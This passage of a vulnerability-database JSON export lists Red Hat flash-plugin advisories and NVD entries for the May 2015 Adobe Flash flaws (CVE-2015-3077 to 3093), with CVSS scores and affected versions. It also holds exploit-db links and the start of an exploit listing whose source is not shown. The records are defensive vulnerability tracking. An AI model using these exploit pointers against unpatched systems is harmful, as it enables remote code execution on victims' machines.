"published": "2015-05-13T04:00:00", "type": "redhat", "title": "(RHSA-2015:1005) Critical: flash-plugin security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-3077", "CVE-2015-3078", "CVE-2015-3079", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3083", "CVE-2015-3084", "CVE-2015-3085", "CVE-2015-3086", "CVE-2015-3087", "CVE-2015-3088", "CVE-2015-3089", "CVE-2015-3090", "CVE-2015-3091", "CVE-2015-3092", "CVE-2015-3093"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T09:04:24", "id": "RHSA-2015:1005", "href": "https://access.redhat.com/errata/RHSA-2015:1005", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-07T05:58:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "11.2.202.457-1.el5", "arch": "i386", "packageName": "flash-plugin", "packageFilename": "flash-plugin-11.2.202.457-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "11.2.202.457-1.el6_6", "arch": "i686", "packageName": "flash-plugin", "packageFilename": "flash-plugin-11.2.202.457-1.el6_6.i686.rpm", "operator": "lt"}], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-06\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-0346, CVE-2015-0347, CVE-2015-0348, CVE-2015-0349,\nCVE-2015-0350, CVE-2015-0351, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\nCVE-2015-0355, CVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to the\ndisclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that could\nallow an attacker to potentially bypass ASLR (Address Space Layout\nRandomization) protection, and make it easier to exploit other flaws.\n(CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.457.\n", "reporter": "RedHat", "published": "2015-04-15T04:00:00", "type": "redhat", "title": "(RHSA-2015:0813) Critical: flash-plugin security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-0346", "CVE-2015-0347", "CVE-2015-0348", "CVE-2015-0349", "CVE-2015-0350", "CVE-2015-0351", "CVE-2015-0352", "CVE-2015-0353", "CVE-2015-0354", "CVE-2015-0355", "CVE-2015-0356", "CVE-2015-0357", "CVE-2015-0358", "CVE-2015-0359", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-3039", "CVE-2015-3040", "CVE-2015-3041", "CVE-2015-3042", "CVE-2015-3043", "CVE-2015-3044"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T09:04:30", "id": "RHSA-2015:0813", "href": "https://access.redhat.com/errata/RHSA-2015:0813", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-09-17T19:00:19", "references": ["https://www.exploit-db.com/exploits/37844/", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://www.securityfocus.com/bid/74609", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 3, "description": "Heap-based buffer overflow in Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allows attackers to execute arbitrary code via unspecified vectors.", "reporter": "NVD", "published": "2015-05-13T07:00:19", "title": "CVE-2015-3088", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3088"], "scanner": [], "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "modified": "2017-09-16T21:29:03", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3088", "id": "CVE-2015-3088", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-17T19:00:19", "references": ["https://www.exploit-db.com/exploits/37843/", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://www.securityfocus.com/bid/74616", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 3, "description": "Integer overflow in Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allows attackers to execute arbitrary code via unspecified vectors.", "reporter": "NVD", "published": "2015-05-13T07:00:18", "title": "CVE-2015-3087", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3087"], "scanner": [], "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "modified": "2017-09-16T21:29:02", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3087", "id": "CVE-2015-3087", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:56:42", "references": ["http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://www.securityfocus.com/bid/74605", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 2, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3078, CVE-2015-3089, and CVE-2015-3093.", "reporter": "NVD", "published": "2015-05-13T07:00:21", "title": "CVE-2015-3090", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3090"], "scanner": [], "modified": "2017-01-02T22:00:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3090", "id": "CVE-2015-3090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-17T19:00:19", "references": ["http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://www.securityfocus.com/bid/74610", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html", "https://www.exploit-db.com/exploits/37840/"], "edition": 3, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow remote attackers to bypass intended restrictions on filesystem write operations via unspecified vectors, a different vulnerability than CVE-2015-3083 and CVE-2015-3085.", "reporter": "NVD", "published": "2015-05-13T07:00:14", "title": "CVE-2015-3082", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3082"], "scanner": [], "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "modified": "2017-09-16T21:29:02", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3082", "id": "CVE-2015-3082", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:56:42", "references": ["http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "http://www.securityfocus.com/bid/74614", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 2, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code by leveraging an unspecified \"type confusion,\" a different vulnerability than CVE-2015-3077 and CVE-2015-3086.", "reporter": "NVD", "published": "2015-05-13T07:00:15", "title": "CVE-2015-3084", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3084"], "scanner": [], "modified": "2017-01-02T21:59:59", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3084", "id": "CVE-2015-3084", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:56:42", "references": ["http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "http://www.securityfocus.com/bid/74614", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 2, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code by leveraging an unspecified \"type confusion,\" a different vulnerability than CVE-2015-3077 and CVE-2015-3084.", "reporter": "NVD", "published": "2015-05-13T07:00:17", "title": "CVE-2015-3086", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3086"], "scanner": [], "modified": "2017-01-02T21:59:59", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3086", "id": "CVE-2015-3086", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:56:42", "references": ["http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "http://www.zerodayinitiative.com/advisories/ZDI-15-216", "http://www.zerodayinitiative.com/advisories/ZDI-15-216/", "https://security.gentoo.org/glsa/201505-02", "http://www.securityfocus.com/bid/74610", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 2, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow remote attackers to bypass intended restrictions on filesystem write operations via unspecified vectors, a different vulnerability than CVE-2015-3082 and CVE-2015-3083.", "reporter": "NVD", "published": "2015-05-13T07:00:16", "title": "CVE-2015-3085", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3085"], "scanner": [], "modified": "2017-01-02T21:59:59", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3085", "id": "CVE-2015-3085", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:56:41", "references": ["http://www.securityfocus.com/bid/74612", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 2, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors.", "reporter": "NVD", "published": "2015-05-13T07:00:12", "title": "CVE-2015-3079", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3079"], "scanner": [], "modified": "2017-01-02T21:59:58", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3079", "id": "CVE-2015-3079", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-18T15:56:41", "references": ["http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "http://www.securityfocus.com/bid/74614", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 2, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code by leveraging an unspecified \"type confusion,\" a different vulnerability than CVE-2015-3084 and CVE-2015-3086.", "reporter": "NVD", "published": "2015-05-13T07:00:10", "title": "CVE-2015-3077", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3077"], "scanner": [], "modified": "2017-01-02T21:59:58", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3077", "id": "CVE-2015-3077", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-17T19:00:19", "references": ["https://www.exploit-db.com/exploits/37841/", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "http://www.securitytracker.com/id/1032285", "https://security.gentoo.org/glsa/201505-02", "http://www.securityfocus.com/bid/74610", "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "http://rhn.redhat.com/errata/RHSA-2015-1005.html", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "edition": 3, "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow remote attackers to bypass intended restrictions on filesystem write operations via unspecified vectors, a different vulnerability than CVE-2015-3082 and CVE-2015-3085.", "reporter": "NVD", "published": "2015-05-13T07:00:15", "title": "CVE-2015-3083", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-3083"], "scanner": [], "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:air_sdk_%26_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "modified": "2017-09-16T21:29:02", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3083", "id": "CVE-2015-3083", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-09T04:17:43", "references": [], "edition": 2, "description": "Exploit for windows platform in category dos / poc", "reporter": "Google Security Research", "published": "2015-08-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "Flash Player Integer Overflow in Function.apply Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3087"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24085", "href": "https://0day.today/exploit/description/24085", "sourceData": "Source: 